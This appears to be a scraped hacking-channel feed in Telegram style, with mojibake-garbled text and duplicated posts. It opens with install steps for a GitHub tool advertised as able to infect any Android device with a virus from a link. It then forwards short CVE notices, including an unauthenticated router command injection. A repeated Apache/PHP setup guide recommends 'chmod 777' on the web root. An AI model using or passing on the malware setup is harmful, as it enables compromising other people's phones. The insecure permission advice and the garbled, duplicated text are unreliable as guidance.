β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Infect Any Android Device With Virus From Link In Termux:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/infect
cd $HOME
ls
cd infect
ls
bash infect.sh
[+]-- Now you need internet connection to continue further
process...
[+]-- You can select any option by clicking on your keyboard
[+]-- Note:- Don't delete any of the scripts included in lol directory (folder)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Infect Any Android Device With Virus From Link In Termux:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/infect
cd $HOME
ls
cd infect
ls
bash infect.sh
[+]-- Now you need internet connection to continue further
process...
[+]-- You can select any option by clicking on your keyboard
[+]-- Note:- Don't delete any of the scripts included in lol directory (folder)
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - noob-hackers/infect: Infect Any Android Device With Virus From Link In Termux
Infect Any Android Device With Virus From Link In Termux - noob-hackers/infect
Forwarded from DailyCVE
π΅Green Packet WiMax DV-360 command injection vulnerability :
-shell avaible
https://dailycve.com/green-packet-wimax-dv-360-command-injection-vulnerability
-shell avaible
https://dailycve.com/green-packet-wimax-dv-360-command-injection-vulnerability
Dailycve
Green Packet WiMax DV-360 command injection vulnerability | CVE
Details:
The Green Packet WiMax DV-360 is a router suitable for Green Packet business homes in the United States. WiMax DV-360 2.10.14-g1.0.6.1 Green Packet has a security flaw that enables command injection, unauthenticated remote execution of commandsβ¦
The Green Packet WiMax DV-360 is a router suitable for Green Packet business homes in the United States. WiMax DV-360 2.10.14-g1.0.6.1 Green Packet has a security flaw that enables command injection, unauthenticated remote execution of commandsβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
The prefecture of Fukuoka leaks data on 9,500 corona-positive persons, errors in sending emails, and errors in fixing access rights.
#Leaks
#Leaks
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
NVIDIA released the first version of the graphics card driver GeForce 461.09 in 2021.
#Updates #Technologies
#Updates #Technologies
Forwarded from DailyCVE
π΅Vulnerability of insufficient authentication in multiple products made by NEC that make RMCP connection by IPMI over LAN:
https://dailycve.com/vulnerability-insufficient-authentication-multiple-products-made-nec-make-rmcp-connection-ipmi-over
https://dailycve.com/vulnerability-insufficient-authentication-multiple-products-made-nec-make-rmcp-connection-ipmi-over
Dailycve
Vulnerability of insufficient authentication in multiple products made by NEC that make RMCP connection by IPMI over LAN | CVE
Details:
The Remote Management Control Protocol (RMCP) for accessing the BMC over a LAN is defined by the Intelligent Platform Management Interface (IPMI) specification v1.5 for remote monitoring and management of hardware status.
Some devices suppliedβ¦
Forwarded from DailyCVE
π΅Unpatched wordpress plugin bug: Site Kit by google.The toggle to allow Site Kit to place Analytics tracking code on a users site remains once they've disconnected Tag Manager..
https://dailycve.com/unpatched-wordpress-site-kit-google-pluginthe-toggle-allow-site-kit-place-analytics-tracking-code
https://dailycve.com/unpatched-wordpress-site-kit-google-pluginthe-toggle-allow-site-kit-place-analytics-tracking-code
Dailycve
Unpatched wordpress Site Kit by google plugin.The toggle to allow Site Kit to place Analytics tracking code on a users site remainsβ¦
Details:
Site Kit is a one-stop solution for WordPress users to use everything Google has to offer to make them successful on the web.a new bug in Site Kit plugin ensure the toggle to allow Site Kit to place Analytics tracking code on a users site remainsβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PHP related path and modification method in ubuntu environment :
php path/usr/bin/php
phpize5 /usr/bin/phpize5
php5-fpm /usr/sbin/php5-fpm
All php configuration files /etc/php5/fpm
Restart php-fpm sudo kill -USR2
Change the development directory path of php in apache2 in ubuntu
After installing php and apache,
how to set the development directory to what you want
The default development directory address: /var/www
change:ο»Ώο»Ώο»Ώsudo ο»Ώvim /etc/apache2/sites-available/default
Change the two places inside /var/www to your desired directory, mine is /home/dev/www
Or create a symbolic link, under /home/dev:
ln -s www /var/www (note that www cannot exist in /home/dev)
Then change the permissions: sudo chmod 777 /var/www
Start apache2
sudo /etc/init.d/apache2 restart
OK!
You can write a script to test it! ! !
Modify the default root directory of the website under Ubuntu10 Apache2 php5
Modify the default document directory of apache2 under ubuntu10.10. The default is in /var/www.
sudo gedit /etc/apache2/sites-enabled/000-default
Find DocumentRoot in the document. Modify the directory where you want to place the web page file later.
as follows:
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
</Directory>
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog ${APACHE_LOG_DIR}/access.log combined
Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>
</VirtualHost>
<VirtualHost *:8080>
DocumentRoot /var/www/
</VirtualHost>
π¦The last step is to restart apache
sudo /etc/init.d/apache2 restart
ubuntu modify the web root directory
Modify the default document root directory
ubuntu default directory is /var/www/html, you
need to modify /setc/apache2/sites-enabled/000-default.conf
DocumentRoot /var/www/XXX, of course, you need to set the permissions, so You can view the ubuntu permission settings
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PHP related path and modification method in ubuntu environment :
php path/usr/bin/php
phpize5 /usr/bin/phpize5
php5-fpm /usr/sbin/php5-fpm
All php configuration files /etc/php5/fpm
Restart php-fpm sudo kill -USR2
cat /var/run/php5-fpm.pidChange the development directory path of php in apache2 in ubuntu
After installing php and apache,
how to set the development directory to what you want
The default development directory address: /var/www
change:ο»Ώο»Ώο»Ώsudo ο»Ώvim /etc/apache2/sites-available/default
Change the two places inside /var/www to your desired directory, mine is /home/dev/www
Or create a symbolic link, under /home/dev:
ln -s www /var/www (note that www cannot exist in /home/dev)
Then change the permissions: sudo chmod 777 /var/www
Start apache2
sudo /etc/init.d/apache2 restart
OK!
You can write a script to test it! ! !
Modify the default root directory of the website under Ubuntu10 Apache2 php5
Modify the default document directory of apache2 under ubuntu10.10. The default is in /var/www.
sudo gedit /etc/apache2/sites-enabled/000-default
Find DocumentRoot in the document. Modify the directory where you want to place the web page file later.
as follows:
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
</Directory>
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog ${APACHE_LOG_DIR}/access.log combined
Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>
</VirtualHost>
<VirtualHost *:8080>
DocumentRoot /var/www/
</VirtualHost>
π¦The last step is to restart apache
sudo /etc/init.d/apache2 restart
ubuntu modify the web root directory
Modify the default document root directory
ubuntu default directory is /var/www/html, you
need to modify /setc/apache2/sites-enabled/000-default.conf
DocumentRoot /var/www/XXX, of course, you need to set the permissions, so You can view the ubuntu permission settings
β β β Uππ»βΊπ«Δπ¬πβ β β β